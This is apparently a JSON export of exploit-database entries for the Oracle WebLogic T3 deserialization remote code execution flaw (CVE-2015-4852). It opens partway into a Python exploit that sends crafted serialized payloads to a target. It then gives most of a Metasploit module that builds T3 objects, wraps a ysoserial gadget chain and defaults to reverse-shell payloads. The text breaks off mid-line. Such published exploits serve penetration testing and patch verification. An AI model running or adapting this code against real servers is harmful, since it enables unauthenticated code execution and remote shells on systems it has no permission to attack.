63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78' \n \ntotallength = len(chunk1) + len(chunk2) + len(chunk3) \nprint \"[+]TOTAL payload length: \", totallength \n \n#Update the TOTAL payload length in Chunk1 \nlen_hex = hex(totallength) \nprint \"[+]Payload length in HEX: \", len_hex \nlen_hex = len_hex.replace('0x', '0') \nprint \"[+]Payload length in HEX: \" , len_hex \n \ns1 = len_hex[:2] \ns2 = len_hex[2:4] \nlen_hex = unhexlify(s1 + s2) \n \nprint \"[+]Payload length in HEX now: \", len_hex \n \n#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2) \nprint \"[+]Updating Chunk1 according to the TOTAL payload length...\" \n \nchunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00' \n \n#print \"[+]Updated 'chunk1' : \\n\", chunk1 \n \n#Get the final payload. This should have appropriate TOTAL payload lenght in 'chunk1' \npayload = chunk1 + chunk2 + chunk3 \n \n#Adjust header for appropriate message length \npayload = \"{0}{1}\".format(struct.pack('!i', len(payload)), payload[4:]) \nprint '[+]Sending payload...' \nsock.send(payload) \n \nprint \"[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!\" \nprint(\"\\n[+]Response to Request#: \\n\") \nresponse = sock.recv(15000) \nprint(response) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/144405/oracleweblogic12-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-28T22:53:29", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Oracle Weblogic Server Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152268", "href": "https://packetstormsecurity.com/files/152268/Oracle-Weblogic-Server-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/exploit/powershell' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Tcp \n#include Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object', \n'Description' => %q{ \nAn unauthenticated attacker with network access to the Oracle Weblogic Server T3 \ninterface can send a serialized object (weblogic.jms.common.StreamMessageImpl) \nto the interface to execute code on vulnerable hosts. \n}, \n'Author' => \n[ \n'Andres Rodriguez', # Metasploit Module - 2Secure (@acamro, acamro[at]gmail.com) \n'Stephen Breen', # Vulnerability Discovery \n'Aaron Soto' # Reverse Engineering JSO and ysoserial blobs \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2015-4852'] \n], \n'Privileged' => false, \n'Platform' => %w{ unix win solaris }, \n'Targets' => \n[ \n[ 'Unix', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}, \n'Payload' => { \n'Encoder' => 'cmd/ifs', \n'BadChars' => ' ', \n'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'} \n} \n], \n[ 'Windows', \n'Platform' => 'win', \n'Payload' => {}, \n'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} \n], \n[ 'Solaris', \n'Platform' => 'solaris', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}, \n'Payload' => { \n'Space' => 2048, \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl telnet', \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jan 28 2015')) \n \nregister_options([Opt::RPORT(7001)]) \nend \n \n=begin This check is currently incompatible with the Tcp mixin. :-( \ndef check \nresp = send_request_cgi( \n'method' => 'GET', \n'uri' => '/console/login/LoginForm.jsp' \n) \n \nreturn CheckCode::Unknown unless resp && resp.code == 200 \n \nunless resp.body.include?('Oracle WebLogic Server Administration Console') \nvprint_warning(\"Oracle WebLogic Server banner cannot be found\") \nreturn CheckCode::Unknown \nend \n \n/WebLogic Server Version: (?<version>\\d+\\.\\d+\\.\\d+\\.\\d*)/ =~ resp.body \nunless version \nvprint_warning(\"Oracle WebLogic Server version cannot be found\") \nreturn CheckCode::Unknown \nend \n \nversion = Gem::Version.new(version) \nvprint_good(\"Detected Oracle WebLogic Server Version: #{version}\") \ncase \nwhen version.to_s.start_with?('10.3') \nreturn CheckCode::Appears unless version > Gem::Version.new('10.3.6.0') \nwhen version.to_s.start_with?('12.1.2') \nreturn CheckCode::Appears unless version > Gem::Version.new('12.1.2.0') \nwhen version.to_s.start_with?('12.1.3') \nreturn CheckCode::Appears unless version > Gem::Version.new('12.1.3.0') \nwhen version.to_s.start_with?('12.2') \nreturn CheckCode::Appears unless version > Gem::Version.new('12.2.1.0') \nend \n \nreturn CheckCode::Safe \nend \n=end \n \ndef t3_handshake \n# retrieved from network traffic \nshake = \"t3 12.2.1\\n\" \nshake << \"AS:255\\n\" \nshake << \"HL:19\\n\" \nshake << \"MS:10000000\\n\\n\" \n \nsock.put(shake) \nsleep(1) \nsock.get_once \nend \n \ndef build_t3_request_object \n# T3 request serialized data \n# retrieved by watching network traffic \n# This is a proprietary, undocumented protocol \n \n# TODO: Cite a source for the dissection of in the following 14 lines: \ndata = '000005c3' # lenght of the packet \ndata << '01' # CMD_IDENTIFY_REQUEST \ndata << '65' # QOS \ndata << '01' # Flags: \n# CONTEXT_JVMID_FLAG = 1 (has JVMIDs) \n# CONTEXT_TX_FLAG = 2 \n# CONTEXT_TRACE_FLAG = 4 \n# CONTEXT_EXTENDED_FLAG = 8 \n# CONTEXT_EXTENDED_USER_FLAG = 16 \ndata << 'ffffffff' # response id \ndata << 'ffffffff' # invocable id \ndata << '0000006a' # abbrev offset \ndata << '0000ea60' # reconnect timeout ?? \n \ndata << '0000001900937b484a' \ndata << '56fa4a777666f581daa4f5b90e2aebfc607499' \ndata << 'b4027973720078720178720278700000000a00' \ndata << '00000300000000000000060070707070707000' \ndata << '00000a000000030000000000000006007006' \n \ndata << 'fe010000' # ----- separator ----- \n \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '72001d' # className (29 bytes): \ndata << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry \ndata << '5461626c65456e747279' # (continued) \ndata << '2f52658157f4f9ed' # serialVersionUID \ndata << '0c00007870' # remainder of object header \ndata << '72' # object header \ndata << '00247765626c6f6769632e636f6d6d6f6e2e696e74' # className (36 bytes): weblogic.common.internal.PackageInfo \ndata << '65726e616c2e5061636b616765496e666f' # (continued) \ndata << 'e6f723e7b8ae1ec9' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0008' # fieldCount = 8 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '4c0009696d706c5469746c65' # 5: Obj: implTitle \ndata << '7400124c6a6176612f6c616e672f537472696e673b' # java/lang/String \ndata << '4c000a696d706c56656e646f72' # 6: Obj: implVendor \ndata << '71007e0003' # (Handle) 0x007e0003 \ndata << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion \ndata << '71007e0003' # (Handle) 0x007e0003 \ndata << '78707702000078' # block footers \n \ndata << 'fe010000' # ----- separator ----- \n \ndata << 'aced0005' # JSO v5 header \ndata << '7372' # object header \ndata << '001d7765626c6f6769632e726a766d2e436c6173' # className (29 bytes): weblogic.rjvm.ClassTableEntry \ndata << '735461626c65456e747279' # (continued) \ndata << '2f52658157f4f9ed' # serialVersionUID \ndata << '0c' # EXTERNALIZABLE | BLOCKDATA \ndata << '00007870' # remainder of object header \ndata << '72' # object header \ndata << '00247765626c6f6769632e636f6d6d6f6e2e696' # className (36 bytes): weblogic.common.internal.VersionInfo \ndata << 'e7465726e616c2e56657273696f6e496e666f' # (continued) \ndata << '972245516452463e' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0003' # fieldCount = 3 \ndata << '5b0008' # array header (8 bytes) \ndata << '7061636b61676573' # ARRAY NAME = 'packages' \ndata << '740027' # TC_STRING className1 (39 bytes) \ndata << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # weblogic/common/internal/PackageInfo \ndata << '6e7465726e616c2f5061636b616765496e666f' # (continued) \ndata << '3b' # (continued) \ndata << '4c000e' # object header (14 bytes) \ndata << '72656c6561736556657273696f6e' # releaseVersion \ndata << '740012' # TC_STRING (18 bytes) \ndata << '4c6a6176612f6c616e672f537472696e673b' # versionInfoAsBytes \ndata << '5b0012' # array header (18 bytes) \ndata << '76657273696f6e496e666f41734279746573' # ARRAY NAME = java/lang/String; \ndata << '740002' # TC_STRING (2 bytes) \ndata << '5b42' # 0x5b42 = [B \ndata << '78' # block footer \n \ndata << '720024' # class (36 bytes) \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e' # weblogic.common.internal.PackageInfo \ndata << '7465726e616c2e5061636b616765496e666f' # (continued) \ndata << 'e6f723e7b8ae1ec9' # serialVersionUID \n \ndata << '02' # SC_SERIALIZABLE \ndata << '0008' # fieldCount = 8 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '4c0009696d706c5469746c65' # 5: Obj: implTitle \ndata << '71' # TC_REFERENCE \ndata << '007e0004' # Handle = 0x007e0004 \ndata << '4c000a696d706c56656e646f72' # 6: Obj: implVendor \ndata << '71' # TC_REFERENCE \ndata << '007e0004' # Handle = 0x007e0004 \ndata << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion \ndata << '71' # TC_REFERENCE \ndata << '007e0004' # Handle = 0x007e0004 \ndata << '78' # class footer \ndata << '70' # TC_NULL \ndata << '77020000' # BLOCKDATA (2 bytes): 0x0000 \ndata << '78' # block footer \n \ndata << 'fe010000' # ----- separator ----- \n \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '72001d' # className (29 bytes): \ndata << '7765626c6f6769632e726a766d2e436c617373' # weblogic.rjvm.ClassTableEntry \ndata << '5461626c65456e747279' # (continued) \ndata << '2f52658157f4f9ed' # serialVersionUID \ndata << '0c00007870' # remainder of object header \ndata << '720021' # className (33 bytes) \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e74' # weblogic.common.internal.PeerInfo \ndata << '65726e616c2e50656572496e666f' # (continued) \ndata << '585474f39bc908f1' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0006' # fieldCount = 6 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '5b00087061636b61676573' # 5: Array: packages \ndata << '740027' # TC_STRING (39 bytes) \ndata << '5b4c7765626c6f6769632f636f6d6d6f6e2f69' # Lweblogic/common/internal/PackageInfo; \ndata << '6e7465726e616c2f5061636b616765496e666f' # (continued) \ndata << '3b' # (continued) \ndata << '78' # block footer \ndata << '720024' # class header \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e74' # Name = Lweblogic/common/internal/PackageInfo; \ndata << '65726e616c2e56657273696f6e496e666f' # (continued) \ndata << '972245516452463e' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0003' # fieldCount = 3 \ndata << '5b0008' # 0: Array \ndata << '7061636b6167657371' # packages \ndata << '007e0003' # Handle = 0x00730003 \ndata << '4c000e72656c6561736556657273696f6e' # 1: Obj: releaseVersion \ndata << '7400124c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String; \ndata << '5b001276657273696f6e496e666f41734279746573' # 2: Array: versionInfoAsBytes \ndata << '740002' # TC_STRING (2 bytes) \ndata << '5b42' # VALUE = 0x5b42 = [B \ndata << '78' # block footer \ndata << '720024' # class header \ndata << '7765626c6f6769632e636f6d6d6f6e2e696e746572' # Name = weblogic.common.internal.PackageInfo \ndata << '6e616c2e5061636b616765496e666f' # (continued) \ndata << 'e6f723e7b8ae1ec9' # serialVersionUID \ndata << '02' # SC_SERIALIZABLE \ndata << '0008' # fieldCount = 8 \ndata << '4900056d616a6f72' # 0: Int: major \ndata << '4900056d696e6f72' # 1: Int: minor \ndata << '49000c726f6c6c696e675061746368' # 2: Int rollingPatch \ndata << '49000b736572766963655061636b' # 3: Int: servicePack \ndata << '5a000e74656d706f726172795061746368' # 4: Bool: temporaryPatch \ndata << '4c0009696d706c5469746c65' # 5: Obj: implTitle \ndata << '71' # TC_REFERENCE \ndata << '007e0005' # Handle = 0x007e0005 \ndata << '4c000a696d706c56656e646f72' # 6: Obj: implVendor \ndata << '71' # TC_REFERENCE \ndata << '007e0005' # Handle = 0x007e0005 \ndata << '4c000b696d706c56657273696f6e' # 7: Obj: implVersion \ndata << '71' # TC_REFERENCE \ndata << '007e0005' # Handle = 0x007e0005 \ndata << '78' # class footer \ndata << '707702000078' # block footers \n \ndata << 'fe00ff' # this cruft again. some kind of footer \n \ndata << 'fe010000' # ----- separator ----- \n \n# weblogic.rjvm.JVMID object \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '720013' # class header \ndata << '7765626c6f6769632e726a766d2e4a564d4944' # name = 'weblogic.rjvm.JVMID' \ndata << 'dc49c23ede121e2a' # serialVersionUID \ndata << '0c' # EXTERNALIZABLE | BLOCKDATA \ndata << '0000' # fieldCount = 0 (!!!) \ndata << '78' # block footer \ndata << '70' # NULL \ndata << '7750' # block header (80 bytes) \ndata << '21' # ! \ndata << '000000000000000000' # 9 NULL BYTES \n \ndata << '0d' # strLength = 13 bytes \n#data << '3139322e3136382e312e323237' # original PoC string = 192.168.1.227 \ndata << '3030302e3030302e3030302e30' # new string = 000.000.000.0 \n# (must be an IP, and length isn't trivially editable) \ndata << '00' # \\0 \n \ndata << '12' # strLength = 18 bytes \n#data << '57494e2d4147444d565155423154362e6568' # original str = WIN-AGDMVQUB1T6.eh \ndata << rand_text_alphanumeric(18).unpack('H*')[0] \n \ndata << '83348cd6' # original = ??? UNKNOWN ??? (Note: Cannot be randomized) \n \ndata << '000000070000' # ??? UNKNOWN ??? \ndata << rport.to_s(16).rjust(4, '0') # callback port \ndata << 'ffffffffffffffffffffffffffffffffffffff' # ??? UNKNOWN ??? \ndata << 'ffffffffff' # ??? UNKNOWN ??? \ndata << '78' # block footer \n \ndata << 'fe010000' # ----- separator ----- \n \n# weblogic.rjvm.JVMID object \ndata << 'aced0005' # JSO v5 header \ndata << '73' # object header \ndata << '72' # class \ndata << '00137765626c6f6769632e726a766d2e4a564d4944' # Name: weblogic.rjvm.JVMID \ndata << 'dc49c23ede121e2a' # serialVersionUID \ndata << '0c' # EXTERNALIZABLE | BLOCKDATA \ndata << '0000' # fieldCount = 0 \ndata << '78' # end block \ndata << '70' # TC_NULL \ndata << '77' # block header \ndata << '20' # length = 32 bytes \ndata << '0114dc42bd071a772700' # old string = ??? UNKNOWN ??? \n#data << rand_text_alphanumeric(10).unpack('H*')[0] # (NOTE: RANDOMIZAITON BREAKS THINGS) \n \ndata << '0d' # string length = 13 bytes (NOTE: do not edit) \n#data << '3234322e3231342e312e323534' # original string = 242.214.1.254 \ndata << '3030302e3030302e3030302e30' # new string = 000.000.000.0 \n# (must be an IP, and length isn't trivially editable) \n \n#data << '61863d1d' # original string = ??? UNKNOWN ??? \ndata << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized \n \ndata << '00000000' # NULL BYTES \ndata << '78' # block footer \n \nsock.put([data].pack('H*')) \nsleep(1) \nsock.get_once \nend \n \ndef send_payload_objdata \n# payload creation \nif target.name == 'Windows' \nmycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true}) \nelsif target.name == 'Unix' || target.name == 'Solaris' \nmycmd = payload.encoded \nend \n \n# basic weblogic ClassTableEntry object (serialized) \n# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT? \npayload = '056508000000010000001b0000005d0101007372017870737202787000000000' \npayload << '00000000757203787000000000787400087765626c6f67696375720478700000' \npayload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306' \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '72' # class header \npayload << '00025b42' # Name: 0x5b42 \npayload << 'acf317f8060854e0' # serialVersionUID \npayload << '02' # SERIALIZABLE \npayload << '0000' # fieldCount = 0 \npayload << '7870' # class footer \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '72' # class header \n \npayload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object; \npayload << '6563743b' # (cont) \npayload << '90ce589f1073296c' # serialVersionUID \npayload << '02' # SERIALIZABLE \npayload << '0000' # fieldCount = 0 \npayload << '7870' # remaining object header \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \n \npayload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry \npayload << '73735461626c65456e747279' # (cont) \npayload << '2f52658157f4f9ed' # serialVersionUID \npayload << '0c' # SERIALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # block footer \npayload << '72' # class header \npayload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector \npayload << 'd9977d5b803baf01' # serialVersionUID \npayload << '03' # WRITE_METHOD | SERIALIZABLE \npayload << '0003' # fieldCount = 3 \npayload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement \npayload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount \npayload << '5b000b656c656d656e7444617461' # 2: Array: elementData \npayload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object; \npayload << '743b' # (cont) \npayload << '7870' # remaining object header \npayload << '77' # block header \npayload << '020000' # contents = 0x0000 \npayload << '78' # block footer \n \npayload << 'fe010000' # ----- separator ----- \n \nysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload(\"CommonsCollections1\",mycmd) \npayload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join \n \npayload << 'fe010000' # ----- separator ----- \n \n# basic weblogic ImmutableServiceContext object (serialized) \npayload << 'aced0005' # JSO v5 header \npayload << '73' # object header \npayload << '72' # class \npayload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext \npayload << '7461626c6553657276696365436f6e74657874' # (cont) \npayload << 'ddcba8706386f0ba' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '78' # object footer \npayload << '72' # block header \npayload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext \npayload << '696465722e426173696353657276696365436f' # (cont) \npayload << '6e74657874' # (cont) \npayload << 'e4632236c5d4a71e' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # block footer \npayload << '77' # block header \npayload << '020600' # contents = 0x0600 \npayload << '7372' # class descriptor \npayload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor \npayload << '726e616c2e4d6574686f644465736372697074' # (cont) \npayload << '6f72' # (cont) \npayload << '12485a828af7f67b' # serialVersionUID \npayload << '0c' # EXTERNALIZABLE | BLOCKDATA \npayload << '0000' # fieldCount = 0 \npayload << '7870' # class footer \npayload << '77' # class data \n \n#payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765 \n#payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c \n#payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b \npayload << rand_text_alphanumeric(52).unpack('H*')[0] # new = 